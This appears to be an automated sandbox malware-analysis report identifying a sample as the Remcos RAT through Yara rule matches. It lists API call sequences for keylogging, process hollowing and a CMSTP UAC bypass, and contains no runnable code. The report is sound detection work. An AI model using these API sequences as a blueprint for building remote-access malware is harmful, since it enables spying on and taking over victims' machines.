                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_00409B10
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041BB87 SystemParametersInfoW,0_2_0041BB87

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,0_2_00417245
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041ACD1 OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041ACD1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041ACFD OpenProcess,NtResumeProcess,CloseHandle,0_2_0041ACFD
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10006FA0 OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_10006FA0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00401806 NtdllDefWindowProc_W,4_2_00401806
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004018C0 NtdllDefWindowProc_W,4_2_004018C0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004016FD NtdllDefWindowProc_A,5_2_004016FD
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004017B7 NtdllDefWindowProc_A,5_2_004017B7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00402CAC NtdllDefWindowProc_A,6_2_00402CAC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00402D66 NtdllDefWindowProc_A,6_2_00402D66
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004158B9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004520E20_2_004520E2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041D0810_2_0041D081
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043D0A80_2_0043D0A8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004371600_2_00437160
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004361BA0_2_004361BA
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004262640_2_00426264
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004313870_2_00431387
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041E5EF0_2_0041E5EF
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0044C7490_2_0044C749
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004267DB0_2_004267DB
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043C9ED0_2_0043C9ED
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00432A590_2_00432A59
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043CC1C0_2_0043CC1C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00434D320_2_00434D32
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043CE4B0_2_0043CE4B
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00440E300_2_00440E30
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00426E830_2_00426E83
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00412F450_2_00412F45
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00452F100_2_00452F10
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00426FBD0_2_00426FBD
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_028471940_2_02847194
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0283B5C10_2_0283B5C1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_100012CB0_2_100012CB
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_100322490_2_10032249
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1001F57B0_2_1001F57B
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1001B5840_2_1001B584
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_100137B00_2_100137B0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000B9700_2_1000B970
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10009AB00_2_10009AB0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10009D200_2_10009D20
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000ED880_2_1000ED88
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000EFB70_2_1000EFB7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044B0404_2_0044B040
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0043610D4_2_0043610D
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004473104_2_00447310
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044A4904_2_0044A490
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040755A4_2_0040755A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0043C5604_2_0043C560
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044B6104_2_0044B610
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044D6C04_2_0044D6C0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004476F04_2_004476F0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044B8704_2_0044B870
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044081D4_2_0044081D
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004149574_2_00414957
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004079EE4_2_004079EE
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00407AEB4_2_00407AEB
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044AA804_2_0044AA80
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00412AA94_2_00412AA9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00404B744_2_00404B74
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00404B034_2_00404B03
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0044BBD84_2_0044BBD8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00404BE54_2_00404BE5
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00404C764_2_00404C76
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00415CFE4_2_00415CFE
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00416D724_2_00416D72
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00446D304_2_00446D30
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00446D8B4_2_00446D8B
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00406E8F4_2_00406E8F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004050385_2_00405038
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0041208C5_2_0041208C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004050A95_2_004050A9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0040511A5_2_0040511A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0043C13A5_2_0043C13A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004051AB5_2_004051AB
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004493005_2_00449300
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0040D3225_2_0040D322
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0044A4F05_2_0044A4F0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0043A5AB5_2_0043A5AB
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004136315_2_00413631
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004466905_2_00446690
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0044A7305_2_0044A730
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004398D85_2_004398D8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004498E05_2_004498E0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0044A8865_2_0044A886
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0043DA095_2_0043DA09
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00438D5E5_2_00438D5E
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00449ED05_2_00449ED0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_0041FE835_2_0041FE83
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_00430F545_2_00430F54
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004050C26_2_004050C2
